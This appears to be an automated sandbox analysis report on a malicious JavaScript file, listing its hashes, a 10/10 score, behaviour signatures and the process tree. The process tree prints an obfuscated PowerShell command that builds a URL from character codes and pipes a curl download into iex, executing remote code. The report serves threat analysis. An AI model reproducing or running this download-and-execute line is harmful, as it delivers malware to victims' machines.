Analysis
-
max time kernel
14s -
max time network
18s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
-
submitted
21-12-2024 14:45
General
-
Target
84bca49e22af81e7e7e34ad3ad995c5004cbef1fb01542d2ccb7599425e0f5e7.js
-
Size
181KB
-
MD5
e2dfa56c2ec7e4376ef630de47f610bf
-
SHA1
4188ba70e5c1c6e62a1480490db1f476830090e7
-
SHA256
84bca49e22af81e7e7e34ad3ad995c5004cbef1fb01542d2ccb7599425e0f5e7
-
SHA512
66fc2414565ddc5e849ce70d1a5121f0b27f9024f0304964ccd546eeae374db279afc685a9b0b5abee11afbc24858096e1ce7e3f69b67e7fb7e326ecabf60e13
-
SSDEEP
3072:nD6z9By3qoE0Yz9By3qoC0t07z9By3qoez9By3qo8:DAk3qhk3qHk3qBk3qx
Score
10/10
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\84bca49e22af81e7e7e34ad3ad995c5004cbef1fb01542d2ccb7599425e0f5e7.js1⤵
-
C:\Windows\system32\conhost.execonhost --headless powershell $hglqbix='ur' ;new-alias printout c$($hglqbix)l;$yhbzwc=(1805,1816,1824,1808,1810,1805,1825,1824,1829,1762,1824,1758,1805,1753,1823,1818,1819,1754,1756,1753,1819,1811,1819,1770,1822,1768,1816,1812,1817,1823,1822,1757,1756);$ivwqpjldt=('bronx','get-cmdlet');$clwsuoteadb=$yhbzwc;foreach($apohlfdsy in $clwsuoteadb){$jovnhyasbeqkrx=$apohlfdsy;$elhauny=$elhauny+[char]($jovnhyasbeqkrx-1707);$ktwoleabhnj=$elhauny; $xnfsgumcekivzo=$ktwoleabhnj};$asqfylrhozbtc[2]=$xnfsgumcekivzo;$tdvnor='rl';$qbrgyd=1;.$([char](9992-9887)+'e'+'x')(printout -useb $xnfsgumcekivzo)1⤵
- Process spawned unexpected child process